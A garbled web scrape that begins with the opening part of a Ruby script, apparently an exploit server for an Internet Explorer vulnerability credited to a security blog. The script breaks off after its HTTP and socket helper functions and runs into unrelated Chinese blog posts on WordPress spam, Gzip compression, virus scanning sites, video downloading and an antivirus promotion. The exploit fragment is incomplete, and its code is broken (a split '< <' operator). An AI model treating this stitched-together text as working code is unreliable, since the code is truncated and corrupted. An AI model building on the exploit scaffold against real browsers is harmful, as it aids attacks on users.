#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
out_str.split("\n").each do |line|
puts " #{line}"
end
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
def to_uni(str)
res = ""
str.each_byte do |b|
res < < "\x00#{b.chr}"
end
res
end
Ticket #11289, IE bug fix Error
In the past 3 days ,every day there were almost 100 spam comments. The Askmit recognized these spams ,but i have to delete these spams myself .I dislike to do this ,so i reactived the Math comment spam protection plugin.However the plugin dosen’t work very well, if u post a comment with the answer blank or wrong ,it will just show u the fallow error message like this:
WordPress ? Error
ERROR: Somethin here.
WordPress 开启Gzip压缩
网络上关于开始Gzip压缩的方法介绍的文章还是很多的,这里有一篇写得比较详细,也就不再重复别人已经做过的工作了(猛击此处查看)。这里我采用的是直接修改index.php文件的方法达到压缩效果的,下载index.php文件后在文件中加入ob_start(“ob_gzhandler”);保存之后替换掉源文件即可,修改之后的文件如下所示:
< ?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
ob_start("ob_gzhandler");
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>
启用压缩之后可以猛击此处检测压缩效果:
| 网址 http://h4ck.ws 检测结果如下: | |
| 是否压缩 | 是 |
| 压缩类型 | gzip |
| 原始文件大小 | 60337 字节 |
| 压缩后文件大小 | 16267 字节 |
| 压缩率(估计值) | 73.04% |
免费在线文件查毒-可疑文件在线扫描
今天从一个网站上看到这么个东西,于是自己就“偷”以一份过来,索然功能不是很强大,但是网址还是收集的比较全的。本来是想添加一个导航链接的,但是折腾了半天发现这个主题和以前用的主题不是十分一样, 没有找到从哪里修改,如果有人知道的话还望不吝赐教。页面效果如下图所示:
猛击此处访问该页面,如果有什么问题可以在此处跟贴说明 
。
奇艺网视频下载方法
昨天在网上随便找视频,话说从奇异上看到了那个“夺宝幸运星”,看了一下效果还不错,比其他的网站上的视频要清晰的多。但是网站没有提供下载链接,并且文件的源地址也加密了。从在线视频网站下载视频的方法网上很多,不外乎是通过历史记录啊,什么之类的东东,但是这样的效率貌似比较低。这里介绍一个另外的方法,也是比较简单的,第一种方法是使用“维棠FLV视频下载软件”,由于奇异的视频链接失效较快,因而可能会出现下载失败的情况。此时只需要重启维棠FLV视频下载软件,然后在任务上点右键重新分析下载地址即可。
如果这种方法不好用的话可以使用firefox来下载视频,下载并安装firefox(需要安装flashgot插件),安装之后打开flashgot插件设置界面,切换到下载标签页,添加要监视的文件扩展名flv和f4v(奇艺网的视频文件格式)。然后确定即可.
诡异的“可疑恶意站点”
今天晚上从站点下方的统计数据进行跳转的时候忽然蹦出这么一个提示信息。但是搜索目标网站的页面代码和js代码中并未发现提示信息的中那个域名,有点奇怪。更奇怪的是这种情况貌似只有在在Safari浏览器下才会出现,并且也不是每次跳转都会出现这个提示。在Opera和ie下则完全不会出现这个提示消息。哪位分析清楚了麻烦通知一声,谢谢撒。 :8
卡巴斯基安全部队2011 【免费一年】
首先 说一下,卡巴斯基的内存占用并没有想象的那么高。当然了,不管咋样毕竟是经久考验的国际杀软,比什么数字啊,什么星之类的要好,个人感觉 。嘎嘎。猛击这里类领取激活码和下载安装程序。活动截止日期到12月3日。